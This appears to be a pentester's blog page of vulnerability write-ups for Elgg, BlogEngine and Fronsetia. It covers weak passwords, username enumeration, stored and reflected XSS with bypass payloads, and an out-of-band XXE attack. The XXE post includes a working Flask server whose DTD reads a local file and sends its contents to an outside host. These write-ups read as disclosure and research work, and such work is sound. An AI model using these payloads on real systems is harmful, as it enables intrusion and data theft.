Thursday, 12 February 2026

Paper-Attacking XAMPP Installs


Have released a paper for attacking and exploiting XAMPP installs :) Links is below.



https://seclists.org/fulldisclosure/2026/Jan/28 
at No comments:

Saturday, 24 January 2026

Friday Fun Pentest Series - 48 - Weak Password Complexity - elggv6.3.3

 Description

- It was noted that the "Password Update" functionality allowed users to set weak passwords.


Weak Password Complexity

Steps to Reproduce:
  1. Visit profile page and change the password to "Passw0rd!"
// HTTP Request - Changing Password

POST /action/usersettings/save HTTP/1.1
Host: elgg.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 216
Origin: http://elgg.local
Sec-GPC: 1
Connection: keep-alive
Referer: http://elgg.local/settings/user/admin
Cookie: Elgg=5ivi0vt1g9jqu1sju70hfnm0mc
Upgrade-Insecure-Requests: 1
Priority: u=0, i

__elgg_token=nIY_M_wh53bUxoHvuKO1YA&__elgg_ts=1769266299&username=admin&name=Admin+User&email_password=&email=admin@example.com&current_password=[REDACTED]&password=Passw0rd%21&password2=Passw0rd%21&language=en&guid=46


// HTTP Response - Changing Password

HTTP/1.1 302 Found
Date: Sat, 24 Jan 2026 14:52:07 GMT
Server: Apache/2.4.52 (Ubuntu)
Cache-Control: must-revalidate, no-cache, no-store, private
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
Location: http://elgg.local/settings/user/admin
Vary: User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 394

<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8" />
        <meta http-equiv="refresh" content="0;url='http://elgg.local/settings/user/admin'" />

        <title>Redirecting to http://elgg.local/settings/user/admin</title>
    </head>
    <body>
        Redirecting to <a href="http://elgg.local/settings/user/admin">http://elgg.local/settings/user/admin</a>.
    </body>
</html>


// HTTP Request - Changing Password - Following Redirect

GET /settings/user/admin HTTP/1.1
Host: elgg.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://elgg.local
Sec-GPC: 1
Connection: keep-alive
Referer: http://elgg.local/action/usersettings/save
Cookie: Elgg=5ivi0vt1g9jqu1sju70hfnm0mc
Upgrade-Insecure-Requests: 1
Priority: u=0, i



// HTTP Response - Changing Password - Following Redirect

HTTP/1.1 200 OK
Date: Sat, 24 Jan 2026 14:52:11 GMT
Server: Apache/2.4.52 (Ubuntu)
Cache-Control: must-revalidate, no-cache, no-store, private
x-frame-options: SAMEORIGIN
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
x-content-type-options: nosniff
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 27859

[...]
<div class="elgg-message elgg-message-success"><div class="elgg-inner"><div class="elgg-body">Password changed</div></div></div>
[...]

at No comments:

Friday Fun Pentest Series - 47 - Username Enumeration - elggv6.3.3

Description

- It was noted that the "Fogot Password" functionality was vulnerable to "Username Enumeration"

Username Enumeration

Steps to Reproduce:
  1. Enter valid user and observe HTTP response
  2. Enter invalid user and observer HTTP response

// HTTP Request - Resetting Password - Valid User

POST /action/user/requestnewpassword HTTP/1.1
Host: elgg.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
Origin: http://elgg.local
Sec-GPC: 1
Connection: keep-alive
Referer: http://elgg.local/forgotpassword
Cookie: Elgg=3v9mqlh8vai2f9hemfo7iqttt6
Upgrade-Insecure-Requests: 1
Priority: u=0, i
__elgg_token=2Cpt0GyVW9swhLkm5PggkQ&__elgg_ts=1769264047&username=admin

// HTTP Response - Resetting Password - Valid User

HTTP/1.1 302 Found
Date: Sat, 24 Jan 2026 14:14:43 GMT
Server: Apache/2.4.52 (Ubuntu)
Cache-Control: must-revalidate, no-cache, no-store, private
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
Location: http://elgg.local/
Vary: User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 318
<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8" />
        <meta http-equiv="refresh" content="0;url='http://elgg.local/'" />
        <title>Redirecting to http://elgg.local/</title>
    </head>
    <body>
        Redirecting to <a href="http://elgg.local/">http://elgg.local/</a>.
    </body>
</html>

// HTTP Request - Following Redirection - Valid User

GET / HTTP/1.1
Host: elgg.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://elgg.local
Sec-GPC: 1
Connection: keep-alive
Referer: http://elgg.local/action/user/requestnewpassword
Cookie: Elgg=3v9mqlh8vai2f9hemfo7iqttt6
Upgrade-Insecure-Requests: 1
Priority: u=0, i

// HTTP Response - Following Redirection - Valid User

HTTP/1.1 200 OK
Date: Sat, 24 Jan 2026 14:14:46 GMT
Server: Apache/2.4.52 (Ubuntu)
Cache-Control: must-revalidate, no-cache, no-store, private
x-frame-options: SAMEORIGIN
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
x-content-type-options: nosniff
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 20646
[...]
<div class="elgg-message elgg-message-success"><div class="elgg-inner"><div class="elgg-body">Successfully requested a new password, email sent</div></div></div>
[...]


// HTTP Request - Resetting Password - Invalid User

POST /action/user/requestnewpassword HTTP/1.1
Host: elgg.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Origin: http://elgg.local
Sec-GPC: 1
Connection: keep-alive
Referer: http://elgg.local/forgotpassword
Cookie: Elgg=3v9mqlh8vai2f9hemfo7iqttt6
Upgrade-Insecure-Requests: 1
Priority: u=0, i
__elgg_token=2Cpt0GyVW9swhLkm5PggkQ&__elgg_ts=1769264047&username=x

// HTTP Response - Resetting Password - Invalid User

HTTP/1.1 302 Found
Date: Sat, 24 Jan 2026 14:15:07 GMT
Server: Apache/2.4.52 (Ubuntu)
Cache-Control: must-revalidate, no-cache, no-store, private
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
Location: http://elgg.local/forgotpassword
Vary: User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 374
<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8" />
        <meta http-equiv="refresh" content="0;url='http://elgg.local/forgotpassword'" />
        <title>Redirecting to http://elgg.local/forgotpassword</title>
    </head>
    <body>
        Redirecting to <a href="http://elgg.local/forgotpassword">http://elgg.local/forgotpassword</a>.
    </body>
</html>

// HTTP Request - Following Redirection - Invalid User

GET /forgotpassword HTTP/1.1
Host: elgg.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://elgg.local
Sec-GPC: 1
Connection: keep-alive
Referer: http://elgg.local/action/user/requestnewpassword
Cookie: Elgg=3v9mqlh8vai2f9hemfo7iqttt6
Upgrade-Insecure-Requests: 1
Priority: u=0, i

// HTTP Response - Following Redirection - Invalid User

HTTP/1.1 200 OK
Date: Sat, 24 Jan 2026 14:15:09 GMT
Server: Apache/2.4.52 (Ubuntu)
Cache-Control: must-revalidate, no-cache, no-store, private
x-frame-options: SAMEORIGIN
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
x-content-type-options: nosniff
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 19681
[...]
<div class="elgg-message elgg-message-error"><div class="elgg-inner"><div class="elgg-body">Username x not found.</div></div></div>
[...]



at No comments:

Saturday, 14 December 2024

Friday Fun Pentest Series - 16 - Stored XSS with Filter Bypass - blogenginev3.3.8


Description

- It was found that the application was vulnerable to Stored XSS via specific payload that bypassed the filtering in place.


Stored XSS Filter Bypass #1 - "Add Category"

Steps to Reproduce:
  1. Login as admin and go to "Content" > "Posts"
  2. On the right side of the page choose "Categories"
  3. In "Title" and "Description" paste the following payload <b>12345</b><script>alert(1)</script><b>12345=</b>

// HTTP PUT request

PUT /blogengine/api/posts/update/foo HTTP/1.1
Host: 192.168.58.153:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
[...]

[...]
","DateCreated":"2024-12-14 14:33","Slug":"xss","RelativeLink":"/blogengine/post/2024/12/14/xss","Categories":[{"IsChecked":false,"Id":"40a7136b-2f0d-491a-8690-2a092681ed3b","Title":"<b>12345</b><script>alert(1)</script><b>12345=</b>"}],"Tags":[],"Comments":null,"HasCommentsEnabled":true,"IsPublished":false,"IsDeleted":false,"CanUserDelete":true,"CanUserEdit":true}
[...]


// HTTP response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sat, 14 Dec 2024 15:34:08 GMT
Content-Length: 0


// HTTP GET request

GET /blogengine/post/2024/12/14/xss HTTP/1.1
Host: 192.168.58.153:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
[...]


// HTTP response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
x-pingback: http://192.168.58.153:8080/blogengine/pingback.axd
Content-Style-Type: text/css
Content-Script-Type: text/javascript
X-Powered-By: ASP.NET
Date: Sat, 14 Dec 2024 15:44:05 GMT
Content-Length: 19229

[...]
<span class="post-category"><a href="/blogengine/category/&lt;b&gt;12345&lt;b&gt;&lt;script&gt;alert(1)&lt;script&gt;&lt;b&gt;12345=&lt;b&gt;"><b>12345</b><script>alert(1)</script><b>12345=</b></a></span></div></header>
[...]






at No comments:

Thursday, 21 November 2024

Friday Fun Pentest Series - 15 - OOB XXE - fronsetiav1.1

Description

- The application is vulnerable to OOB XXE injection


XXE #1 - "show_operations.jsp"

Steps to Reproduce:

  1. Add Python3 server to serve malicious XXE payload
  2. Add a file on the file system to be read via the application XXE payload echo 123123 > /tmp
  3. Enter the following URL as input
http://192.168.78.128:8080/fronsetia/show_operations.jsp?Fronsetia_WSDL=http://192.168.78.1:10000/testxxeService?wsdl











// Python Server Code

from flask import Flask, Response, request
import logging

app = Flask(__name__)

# Set up logging
logging.basicConfig(level=logging.DEBUG)

@app.route('/testxxeService', defaults={'path': ''})
def catch_all(path):
    app.logger.debug("Serving XXE payload")
    xml = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY % dtd SYSTEM "http:// 192.168.78.1:10000/data.dtd"> %dtd;
]>
<data>&send;</data>"""
    return Response(xml, mimetype='text/xml', status=200)

@app.route('/data.dtd', defaults={'path': ''})
def hello(path):
    app.logger.debug("DTD requested")
    xml = """<!ENTITY % file SYSTEM "file:///tmp/123">
<!ENTITY % eval "<!ENTITY &#37; exfil SYSTEM 'http://192.168.78.1:8000/?content=%file;'>">
%eval;
%exfil;"""
    return Response(xml, mimetype='text/xml', status=200)

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=10000)

at No comments:

Wednesday, 20 November 2024

Friday Fun Pentest Series - 14 - Reflected XSS - fronsetiav1.1

 Description

- It was found that the application was vulnerable to Reflected XSS


Reflected XSS #1 - "show_operations.jsp"

Steps to Reproduce:

  1. Visit main page of the application.
  2. In the input field of "WSDL Location" enter the following payload "><img src=x onerror=alert(1)>

// HTTP GET Request

GET /fronsetia/show_operations.jsp?Fronsetia_WSDL=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E HTTP/1.1
Host: 192.168.78.128:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
[...]


// HTTP Response

HTTP/1.1 200 
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6360
Date: Wed, 20 Nov 2024 19:42:15 GMT
Keep-Alive: timeout=20
Connection: keep-alive

[...]
<title> Fronsetia: "><img src=x onerror=alert(1)> </title>
[...]






















at No comments:

Thursday, 7 November 2024

Its Official - BSCP Certified

Its official. Im BSCP (Burp Suite Certified Practitioner) certified. Took me a few tries to pass :)













Key takeaways from the attempts:

  • Dont give up 
  • Its a difficult exam
  • Check all the relevant labs in the Portswigger Academy
  • Check for bypasses in the Academy labs 
  • Make sure to have a good list of notes such as payloads and bypasses ready 

Thats it folks !
at No comments:
Subscribe to: Posts (Atom)

Paper-Attacking XAMPP Installs

Have released a paper for attacking and exploiting XAMPP installs :) Links is below. https://seclists.org/fulldisclosure/2026/Jan/28